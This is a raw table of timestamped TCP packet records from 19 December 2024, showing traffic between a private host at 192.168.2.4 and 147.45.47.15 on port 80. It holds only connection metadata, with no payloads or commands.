                                                                                                              Dec 19, 2024 08:11:41.927089930 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.929083109 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.929270983 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.929317951 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.931678057 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.931734085 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.931780100 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.934145927 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.934328079 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.934367895 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.936719894 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.936899900 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.936947107 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.939407110 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.939462900 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.939502954 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.941446066 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.941464901 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.941512108 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.943384886 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.943404913 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.943449974 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.945233107 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.945285082 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.945333958 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.947058916 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.947246075 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.947290897 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.948998928 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.949012041 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.949052095 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.950655937 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.950762033 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.950808048 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.952900887 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.952913046 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.952955008 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.955143929 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.955156088 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.955209970 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:41.956351042 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.956542015 CET8049734147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:41.956587076 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:42.158627033 CET4973480192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:48.186959028 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:48.306548119 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:48.306633949 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:48.307334900 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:48.428348064 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:49.573472023 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:49.573534966 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:49.573571920 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:49.573637962 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:49.573688984 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:49.573726892 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:49.573746920 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:49.573767900 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:49.573803902 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:49.573844910 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:49.573860884 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:49.573899984 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:49.574033976 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:49.574049950 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:49.575548887 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:49.693814993 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:49.693854094 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:49.693928957 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:49.765598059 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:49.765618086 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:49.765671015 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:49.769773960 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:49.769880056 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:49.769942999 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:49.778192043 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:49.778532982 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:49.778651953 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:49.786561966 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:49.786607981 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:49.786725998 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:49.794920921 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:49.795157909 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:49.795667887 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:49.803246975 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:49.803359032 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:49.803409100 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:49.811640024 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:49.811760902 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:49.811805964 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:49.820003033 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:49.820141077 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:49.820187092 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:49.828408003 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:49.828572989 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:49.828629971 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:49.837003946 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:49.837028027 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:49.837075949 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:49.845130920 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:49.845227957 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:49.845375061 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:49.885358095 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:49.926255941 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:49.957727909 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:49.957802057 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:49.957856894 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:49.960247993 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:49.961224079 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:49.961265087 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:49.961287022 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:49.966367006 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:49.966403008 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:49.966516972 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:49.971256018 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:49.971350908 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:49.971360922 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:49.976211071 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:49.976253986 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:49.976293087 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:49.981121063 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:49.981143951 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:49.981185913 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:49.985829115 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:49.985913992 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:49.985960960 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:49.990832090 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:49.990855932 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:49.990878105 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:49.996855974 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:49.996872902 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:49.996917963 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:50.000284910 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.000371933 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.000400066 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:50.005182028 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.005230904 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:50.005434036 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.010000944 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.010019064 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.010067940 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:50.014770031 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.014841080 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:50.014863968 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.019619942 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.019675016 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:50.019712925 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.024904013 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.024919987 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.024950981 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:50.029294968 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.029346943 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:50.029359102 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.034687042 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.034704924 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.034737110 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:50.038994074 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.039010048 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.039078951 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:50.043673038 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.043721914 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:50.043756008 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.048521996 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.048577070 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:50.048604012 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.098143101 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:50.150216103 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.150239944 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.150290012 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:50.152066946 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.152390003 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.152436972 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:50.156063080 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.157284975 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.157360077 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:50.157577038 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.161423922 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.161443949 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.161487103 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:50.165153027 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.165169954 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.165292978 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:50.169137955 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.169157982 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.169203997 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:50.172559023 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.172621965 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:50.172662973 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.176093102 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.176110029 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.176155090 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:50.178972006 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.179049015 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.179053068 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:50.181821108 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.181895971 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:50.181942940 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.184756994 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.184803963 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:50.184900999 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.187506914 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.187553883 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:50.187612057 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.190392017 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.190535069 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:50.190888882 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.193279982 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.193368912 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.193386078 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:50.196110964 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.196207047 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.196213961 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:50.198982954 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.199048996 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:50.199064970 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.201817036 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.201877117 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:50.201946020 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.204710960 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.204821110 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.204832077 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:50.207530022 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.207590103 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:50.207643986 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.210457087 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.210501909 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.210508108 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:50.213367939 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.213453054 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:50.213514090 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.216109991 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.216167927 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.216207981 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:50.218966961 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.219014883 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:50.219198942 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.221837997 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.221898079 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:50.221929073 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.224668026 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.224772930 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.224791050 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:50.227554083 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.227617025 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:50.227654934 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.230395079 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.230472088 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:50.230495930 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.233227968 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.233335018 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:50.233349085 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.236124039 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.236174107 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:50.236229897 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.238986969 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.239090919 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.239115953 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:50.241825104 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.241874933 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:50.241906881 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.244787931 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.244807005 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.244846106 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:50.247582912 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.247641087 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:50.247670889 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.250411034 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.250461102 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:50.250533104 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.253233910 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.253304958 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:50.342209101 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.342436075 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.342570066 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:50.343434095 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.343569994 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.343611002 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:50.345906973 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.346010923 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.346084118 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:50.348407984 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.348515034 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.348577023 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:50.350892067 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.351016998 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.351059914 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:50.353375912 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.353585958 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.353656054 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:50.355741978 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.355881929 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.355948925 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:50.358113050 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.358231068 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.358479023 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:50.360483885 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.360686064 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.360730886 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:50.362705946 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.362809896 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.362852097 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:50.364976883 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.365025043 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.365227938 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:50.367151976 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.367274046 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.367327929 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:50.369360924 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.369483948 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.369590998 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:50.371498108 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.371576071 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.371650934 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:50.373580933 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.373764038 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.373807907 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:50.375799894 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.375816107 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.376095057 CET4973880192.168.2.4147.45.47.15
                                                                                                              Dec 19, 2024 08:11:50.377779961 CET8049738147.45.47.15192.168.2.4
                                                                                                              Dec 19, 2024 08:11:50.377881050 CET8049738147.45.47.15192.168.2.4
